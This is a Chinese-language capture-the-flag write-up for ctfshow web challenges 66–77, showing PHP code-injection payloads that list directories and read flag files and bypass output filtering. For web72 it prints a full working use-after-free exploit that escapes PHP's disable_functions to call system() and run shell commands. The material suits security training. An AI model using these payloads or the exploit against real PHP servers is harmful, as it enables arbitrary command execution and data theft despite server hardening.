$flag="ctfshow{fb109fb6-b936-48dd-9fce-ffe57ca22afa}";

web66


Warning: show_source() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1

好好好,梭的这么多,终于不能用了,

试一下readfile,好好好,也不能用

还是先扫一下吧

c=print_r(scandir("."));
Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

还是在flag.php的,我们试一下别的方法读取

试一下highlight_file

$flag="秀秀得了,这次不在这里";

6

再看看目录吧

c=print_r(scandir("/"));

有个flag.txt

读一下

ctfshow{709406c7-988b-4659-b38b-a7fef725bb22}

web67

用上一题一样能读出来

ctfshow{22fcdb01-0a07-4668-b20d-21fc0fe6480f}

web68


Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

上来就说highlight_file不给用,但毕竟放在flag.txt里

include就读出来了

c=include("flag.txt");
ctfshow{1e369e41-0b48-4b6d-832f-d8abe26ad96f}

web69

ctfshow{851b7aef-a568-41b7-9507-eadc62f68d57}

web70

ctfshow{e72faa3b-1330-4b97-bb61-ad73f970fc21}

web71

先扫盘

???????: ?????_?????????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_???() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? [".","..","????.???","?????.???"] 你要上天吗?

看一下源代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

你要上天吗?

大概是说,有个清空过程,我们需要再eval后就结束,可以在结尾加一个exit();

构造payload

c=echo json_encode(scandir("."));exit();
c=echo json_encode(scandir("/"));exit();

拿到flag

c=include('/flag.txt');exit();

web72

扫盘时发现,”/“,被禁用,用一下glob伪协议

构造payload

?c=echo json_encode(scandir("glob:///*"));exit();

扫出了flag0.txt

include也无法包含”/“,就考虑一下脚本了

c=function ctfshow($cmd) { global $abc, $helper, $backtrace;

class Vuln {
    public $a;
    public function __destruct() { 
        global $backtrace; 
        unset($this->a);
        $backtrace = (new Exception)->getTrace();
        if(!isset($backtrace[1]['args'])) {
            $backtrace = debug_backtrace();
        }
    }
}

class Helper {
    public $a, $b, $c, $d;
}

function str2ptr(&$str, $p = 0, $s = 8) {
    $address = 0;
    for($j = $s-1; $j >= 0; $j--) {
        $address <<= 8;
        $address |= ord($str[$p+$j]);
    }
    return $address;
}

function ptr2str($ptr, $m = 8) {
    $out = "";
    for ($i=0; $i < $m; $i++) {
        $out .= sprintf("%c",($ptr & 0xff));
        $ptr >>= 8;
    }
    return $out;
}

function write(&$str, $p, $v, $n = 8) {
    $i = 0;
    for($i = 0; $i < $n; $i++) {
        $str[$p + $i] = sprintf("%c",($v & 0xff));
        $v >>= 8;
    }
}

function leak($addr, $p = 0, $s = 8) {
    global $abc, $helper;
    write($abc, 0x68, $addr + $p - 0x10);
    $leak = strlen($helper->a);
    if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
    return $leak;
}

function parse_elf($base) {
    $e_type = leak($base, 0x10, 2);

    $e_phoff = leak($base, 0x20);
    $e_phentsize = leak($base, 0x36, 2);
    $e_phnum = leak($base, 0x38, 2);

    for($i = 0; $i < $e_phnum; $i++) {
        $header = $base + $e_phoff + $i * $e_phentsize;
        $p_type  = leak($header, 0, 4);
        $p_flags = leak($header, 4, 4);
        $p_vaddr = leak($header, 0x10);
        $p_memsz = leak($header, 0x28);

        if($p_type == 1 && $p_flags == 6) { 

            $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
            $data_size = $p_memsz;
        } else if($p_type == 1 && $p_flags == 5) { 
            $text_size = $p_memsz;
        }
    }

    if(!$data_addr || !$text_size || !$data_size)
        return false;

    return [$data_addr, $text_size, $data_size];
}

function get_basic_funcs($base, $elf) {
    list($data_addr, $text_size, $data_size) = $elf;
    for($i = 0; $i < $data_size / 8; $i++) {
        $leak = leak($data_addr, $i * 8);
        if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
            $deref = leak($leak);
            
            if($deref != 0x746e6174736e6f63)
                continue;
        } else continue;

        $leak = leak($data_addr, ($i + 4) * 8);
        if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
            $deref = leak($leak);
            
            if($deref != 0x786568326e6962)
                continue;
        } else continue;

        return $data_addr + $i * 8;
    }
}

function get_binary_base($binary_leak) {
    $base = 0;
    $start = $binary_leak & 0xfffffffffffff000;
    for($i = 0; $i < 0x1000; $i++) {
        $addr = $start - 0x1000 * $i;
        $leak = leak($addr, 0, 7);
        if($leak == 0x10102464c457f) {
            return $addr;
        }
    }
}

function get_system($basic_funcs) {
    $addr = $basic_funcs;
    do {
        $f_entry = leak($addr);
        $f_name = leak($f_entry, 0, 6);

        if($f_name == 0x6d6574737973) {
            return leak($addr + 8);
        }
        $addr += 0x20;
    } while($f_entry != 0);
    return false;
}

function trigger_uaf($arg) {

    $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
    $vuln = new Vuln();
    $vuln->a = $arg;
}

if(stristr(PHP_OS, 'WIN')) {
    die('This PoC is for *nix systems only.');
}

$n_alloc = 10; 
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
    $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

trigger_uaf('x');
$abc = $backtrace[1]['args'][0];

$helper = new Helper;
$helper->b = function ($x) { };

if(strlen($abc) == 79 || strlen($abc) == 0) {
    die("UAF failed");
}

$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;

write($abc, 0x60, 2);
write($abc, 0x70, 6);

write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);

$closure_obj = str2ptr($abc, 0x20);

$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
    die("Couldn't determine binary base address");
}

if(!($elf = parse_elf($base))) {
    die("Couldn't parse ELF header");
}

if(!($basic_funcs = get_basic_funcs($base, $elf))) {
    die("Couldn't get basic_functions address");
}

if(!($zif_system = get_system($basic_funcs))) {
    die("Couldn't get zif_system address");
}


$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
    write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}

write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); 
write($abc, 0xd0 + 0x68, $zif_system); 

($helper->b)($cmd);
exit();
}

ctfshow("cat /flag0.txt");ob_end_flush(); ?>

很长的一串,我也看不懂,反正打进去就对了()

web73

比上题简单一点,能用以前的方法接着做

web74

换一下函数,不能用scandir了,用glob读

构造payload

c=echo json_encode(glob("*"));exit();
c=echo json_encode(glob("/*"));exit();

扫出来有flagx.txt

用include能读出来

web75-77

太玄学了这几题,大题就是说用sql语句,弱密码去读服务器里的flag文件